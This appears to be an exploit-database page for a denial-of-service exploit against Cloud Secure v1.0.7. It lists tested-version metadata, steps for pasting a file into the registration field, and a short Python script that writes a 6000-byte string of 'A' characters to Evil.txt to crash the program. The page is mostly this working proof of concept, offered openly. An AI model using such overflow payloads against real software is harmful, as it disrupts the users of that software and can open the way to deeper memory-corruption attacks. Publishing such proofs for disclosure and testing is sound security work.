Cloud Secure v1.0.7 Denial of Service Exploit

2020.05.17

Achilles (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Cloud Secure v1.0.7 Denial of Service Exploit
# Date: 16.05.2020
# Vendor Homepage:https://www.newsoftwares.net
# Software Link:  https://www.newsoftwares.net/download/cloudsecure1-en/cloudsecure-en.exe
# Exploit Author: Achilles
# Tested Version: 1.0.7
# Tested on: Windows 7 x64


# 1.- Run python code :Cloud_Secure.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Cloud_Secure.exe and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cloud Secure v1.0.7 Denial of Service Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.